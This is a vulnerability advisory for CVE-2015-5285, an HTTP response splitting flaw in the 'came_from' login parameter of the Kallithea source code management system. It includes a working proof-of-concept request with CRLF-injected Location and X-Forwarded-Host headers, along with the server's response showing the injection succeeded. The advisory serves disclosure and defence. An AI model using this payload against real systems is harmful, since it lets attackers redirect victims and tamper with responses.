Kallithea 0.2.9 - 'came_from' HTTP Response Splitting







Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability

Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2

Summary: Kallithea, a member project of Software Freedom Conservancy,
is a GPLv3'd, Free Software source code management system that supports
two leading version control systems, Mercurial and Git, and has a web
interface that is easy to use for users and admins.

Desc: Kallithea suffers from a HTTP header injection (response splitting)
vulnerability because it fails to properly sanitize user input before
using it as an HTTP header value via the GET 'came_from' parameter in
the login instance. This type of attack not only allows a malicious
user to control the remaining headers and body of the response the
application intends to send, but also allow them to create additional
responses entirely under their control.

Tested on: Kali

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285



GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438


HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

  <title>302 Found</title>
  <h1>302 Found</h1>
  The resource was found at <a href="
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
you should be redirected automatically.